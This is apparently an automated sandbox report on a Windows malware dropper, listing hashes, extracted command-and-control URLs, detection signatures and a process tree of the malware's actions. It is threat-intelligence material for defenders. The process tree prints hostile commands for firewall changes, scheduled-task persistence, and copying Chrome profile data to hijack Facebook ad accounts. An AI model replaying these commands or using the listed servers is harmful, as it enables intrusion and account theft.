Resubmissions

04/10/2024, 18:01  241004-wl132axhpm  10
22/04/2024, 20:52  240422-znvwksgb77  10
27/02/2024, 22:40  240227-2lykssdc83  10
03/01/2024, 09:53  240103-lw3dqscehj  10
29/12/2023, 23:48  231229-3txtxadcb8  10

Analysis
max time kernel: 1s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
submitted: 29/12/2023, 23:48
Static task: static1
Behavioral task: behavioral1 (Sample: 078192e792b12a8d9980f364e110155c.exe, Resource: win7-20231215-en)
Behavioral task: behavioral2 (Sample: 078192e792b12a8d9980f364e110155c.exe, Resource: win10v2004-20231215-en)
General

Target: 078192e792b12a8d9980f364e110155c.exe
Size: 8.7MB
MD5: 078192e792b12a8d9980f364e110155c
SHA1: 89596e27530eeccd6ad9644aa045e8e0499301a1
SHA256: 67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
SHA512: 72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
SSDEEP: 196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J
Malware Config

Extracted: smokeloader
  pub2

Extracted: ffdroider
  http://186.2.171.3

Extracted: metasploit
  windows/single_exec

Extracted: socelars
  http://www.iyiqian.com/
  http://www.xxhufdc.top/
  http://www.uefhkice.xyz/
  http://www.fcektsy.top/

Extracted: smokeloader
  2020
  http://aucmoney.com/upload/
  http://thegymmum.com/upload/
  http://atvcampingtrips.com/upload/
  http://kuapakualaman.com/upload/
  http://renatazarazua.com/upload/
  http://nasufmutlu.com/upload/

Extracted: raccoon
  1.7.3
  92be0387873e54dd629b9bfa972c3a9a88e6726c
  url4cnc: https://t.me/gishsunsetman
Signatures

Detect Fabookie payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x00080000000231e0-24.dat | family_fabookie
  behavioral2/files/0x00080000000231e0-29.dat | family_fabookie

FFDroider payload (3 IoCs)
  resource | yara_rule
  behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp | family_ffdroider
  behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp | family_ffdroider
  behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp | family_ffdroider

Glupteba payload (9 IoCs)
  resource | yara_rule
  behavioral2/memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp | family_glupteba
  behavioral2/memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp | family_glupteba
  behavioral2/memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/5320-272-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba
  behavioral2/memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp | family_glupteba

MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

PrivateLoader
  PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3748 | 4968 | rUNdlL32.eXe | 103

Raccoon Stealer V1 payload (4 IoCs)
  resource | yara_rule
  behavioral2/memory/6644-1347-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1
  behavioral2/memory/6644-1348-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1
  behavioral2/memory/6644-1352-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1
  behavioral2/memory/6644-1350-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon_v1

SmokeLoader
  Modular backdoor trojan in use since 2014.

Socelars payload (2 IoCs)
  resource | yara_rule
  behavioral2/files/0x00060000000231e7-42.dat | family_socelars
  behavioral2/files/0x00060000000231e7-50.dat | family_socelars

Nirsoft (3 IoCs)
  resource | yara_rule
  behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp | Nirsoft
  behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp | Nirsoft
  behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp | Nirsoft

Modifies Windows Firewall (1 TTP, 1 IoC)
  pid | Process
  5700 | netsh.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | 078192e792b12a8d9980f364e110155c.exe

Executes dropped EXE (2 IoCs)
  pid | Process
  3068 | Files.exe
  1196 | KRSetp.exe

yara_rule upx (4 IoCs)
  resource | yara_rule
  behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp | upx
  behavioral2/memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp | upx
  behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp | upx
  behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp | upx

yara_rule vmprotect (4 IoCs)
  resource | yara_rule
  behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect
  behavioral2/memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect
  behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect
  behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp | vmprotect

Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" | Files.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (4 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  9 | ip-api.com
  11 | ipinfo.io
  13 | ipinfo.io
  21 | ipinfo.io

Looks up geolocation information via web service
  Uses a legitimate geolocation service to find the infected system's geolocation info.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Program crash (2 IoCs)
  pid | pid_target | Process | procid_target
  1608 | 3372 | WerFault.exe | 110
  5800 | 2340 | WerFault.exe | 96

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  3228 | schtasks.exe

GoLang User-Agent (1 IoC)
  Uses default user-agent string defined by GoLang HTTP packages.
  description | flow | ioc
  HTTP User-Agent header | 87 | Go-http-client/1.1

Kills process with taskkill (1 IoC)
  pid | Process
  3480 | taskkill.exe

Suspicious use of WriteProcessMemory (5 IoCs)
  description | pid | Process | procid_target
  PID 712 wrote to memory of 3068 | 712 | 078192e792b12a8d9980f364e110155c.exe | 91
  PID 712 wrote to memory of 3068 | 712 | 078192e792b12a8d9980f364e110155c.exe | 91
  PID 712 wrote to memory of 3068 | 712 | 078192e792b12a8d9980f364e110155c.exe | 91
  PID 712 wrote to memory of 1196 | 712 | 078192e792b12a8d9980f364e110155c.exe | 94
  PID 712 wrote to memory of 1196 | 712 | 078192e792b12a8d9980f364e110155c.exe | 94
Processes

Process tree (indented by depth; [n] is the depth, followed by the image path, PID, command line and the signatures triggered by that process)

[1] C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe (PID 712)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"
    signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\Files.exe (PID 3068)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      signatures: Executes dropped EXE; Adds Run key to start application

    [3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (PID 3348)
        cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

    [3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (PID 5216)
        cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

  [2] C:\Users\Admin\AppData\Local\Temp\KRSetp.exe (PID 1196)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
      signatures: Executes dropped EXE

  [2] C:\Users\Admin\AppData\Local\Temp\Install_Files.exe (PID 2900)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"

  [2] C:\Users\Admin\AppData\Local\Temp\pub2.exe (PID 2340)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\pub2.exe"

    [3] C:\Windows\SysWOW64\WerFault.exe (PID 5800)
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 368
        signatures: Program crash

  [2] C:\Users\Admin\AppData\Local\Temp\Complete.exe (PID 1580)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Complete.exe"

  [2] C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe (PID 3616)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2432)
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3400)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff959204718

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2112)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3060)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3864)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3256)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2036)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5516)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 5500)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5596)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5588)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6128)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6120)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1

    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4816)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:2

  [2] C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 1648)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"

    [3] C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 6644)
        cmdline: C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe

    [3] C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 6636)
        cmdline: C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe

    [3] C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe (PID 6628)
        cmdline: C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe

  [2] C:\Users\Admin\AppData\Local\Temp\Info.exe (PID 452)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Info.exe"

    [3] C:\Users\Admin\AppData\Local\Temp\Info.exe (PID 5320)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Info.exe"

      [4] C:\Windows\system32\cmd.exe (PID 5916)
          cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

      [4] C:\Windows\rss\csrss.exe (PID 1376)
          cmdline: C:\Windows\rss\csrss.exe /94-94

        [5] C:\Windows\SYSTEM32\schtasks.exe (PID 3228)
            cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            signatures: Creates scheduled task(s)

        [5] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe (PID 2824)
            cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

  [2] C:\Users\Admin\AppData\Local\Temp\Folder.exe (PID 1164)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"

  [2] C:\Users\Admin\AppData\Local\Temp\Install.exe (PID 2316)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Install.exe"

    [3] C:\Windows\SysWOW64\cmd.exe (PID 5168)
        cmdline: cmd.exe /c taskkill /f /im chrome.exe

      [4] C:\Windows\SysWOW64\taskkill.exe (PID 3480)
          cmdline: taskkill /f /im chrome.exe
          signatures: Kills process with taskkill

    [3] C:\Windows\SysWOW64\xcopy.exe (PID 1324)
        cmdline: xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y

    [3] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5864)
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5992)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1764)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2796)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2132)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4784)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1412)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5952)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6352)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6096)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6052)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6856)
          cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2

[1] C:\Users\Admin\AppData\Local\Temp\Folder.exe (PID 1116)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a

[1] C:\Windows\System32\CompPkgSrv.exe (PID 1548)
    cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

[1] C:\Windows\SysWOW64\rundll32.exe (PID 3372)
    cmdline: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

  [2] C:\Windows\SysWOW64\WerFault.exe (PID 1608)
      cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 604
      signatures: Program crash

[1] C:\Windows\System32\CompPkgSrv.exe (PID 684)
    cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

[1] C:\Windows\SysWOW64\WerFault.exe (PID 2992)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 3372

[1] C:\Windows\system32\rUNdlL32.eXe (PID 3748)
    cmdline: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    signatures: Process spawned unexpected child process

[1] C:\Windows\SysWOW64\WerFault.exe (PID 5768)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 2340

[1] C:\Windows\system32\netsh.exe (PID 5700)
    cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    signatures: Modifies Windows Firewall

[1] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5892)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b9778

[1] C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe (PID 1804)
    cmdline: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
Network

MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)
Downloads